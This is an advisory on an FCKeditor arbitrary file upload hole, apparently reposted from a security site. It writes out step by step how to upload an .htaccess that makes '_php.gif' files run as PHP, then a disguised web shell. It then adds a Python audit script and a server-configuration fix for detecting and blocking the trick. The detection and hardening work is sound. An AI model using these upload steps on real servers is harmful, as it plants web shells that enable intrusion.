FCKeditor Upload vulnerability, all PHP versions
Author: anonymous. Source: compiled by this site. Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available from the server.
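The technique above leaves two artifacts in the editor's upload directory: an .htaccess that maps a non-PHP extension to the PHP handler, and an uploaded file whose name carries "php" behind an image extension (FCKeditor's rename turns shell.php.gif into shell_php.gif). The following audit script, added here as an example and not part of the original advisory or of FCKeditor, checks an upload tree for both. The directory layout and file contents in SAMPLE_UPLOADS are constructed for the demonstration; the function names are the example's own.

```python
from __future__ import annotations

import re

# Apache directives that can make a file execute as PHP regardless of its extension.
# Any of these in an .htaccess inside a user-writable upload directory is a red flag.
PHP_HANDLER_RE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType|ForceType)\s+.*php",
    re.IGNORECASE | re.MULTILINE,
)

# Filenames where "php" sits behind a harmless-looking final extension.
# Matches both the raw double extension (shell.php.gif) and the renamed form
# FCKeditor produces (shell_php.gif); plain image names do not match.
DOUBLE_EXT_RE = re.compile(r"[._]php\d?[._][a-z0-9]+$", re.IGNORECASE)


def htaccess_sets_php_handler(text: str) -> list[str]:
    """Return the offending handler lines found in an .htaccess body (empty if clean)."""
    return [m.group(0).strip() for m in PHP_HANDLER_RE.finditer(text)]


def is_suspicious_upload_name(name: str) -> bool:
    """True for names such as shell_php.gif or shell.php.gif, False for holiday.jpg."""
    return bool(DOUBLE_EXT_RE.search(name))


def audit_upload_dir(files: dict[str, str]) -> list[str]:
    """Audit an upload tree given as {relative_path: content}; return one finding per hit."""
    findings: list[str] = []
    for path, content in files.items():
        base = path.rsplit("/", 1)[-1]
        if base == ".htaccess":
            for line in htaccess_sets_php_handler(content):
                findings.append(f"{path}: PHP handler directive in upload dir: {line}")
        elif is_suspicious_upload_name(base):
            findings.append(f"{path}: suspicious double extension")
    return findings


# Constructed sample upload tree (not real files from the advisory); it mirrors
# the two artifacts the steps above would leave behind.
SAMPLE_UPLOADS = {
    "userfiles/image/.htaccess": (
        '<FilesMatch "_php.gif">\n'
        "SetHandler application/x-httpd-php\n"
        "</FilesMatch>\n"
    ),
    "userfiles/image/shell_php.gif": "(constructed placeholder content)",
    "userfiles/image/holiday.jpg": "(constructed placeholder content)",
    "userfiles/image/report.pdf": "(constructed placeholder content)",
}

if __name__ == "__main__":
    for finding in audit_upload_dir(SAMPLE_UPLOADS):
        print(finding)
```

Run against a real tree by walking the upload root with os.walk and reading each file into the dictionary. Detection is the fallback; the fix is to deny the upload directory any say in how Apache serves it (AllowOverride None for that directory in the server configuration, and no PHP handler active beneath it), so an uploaded .htaccess is inert.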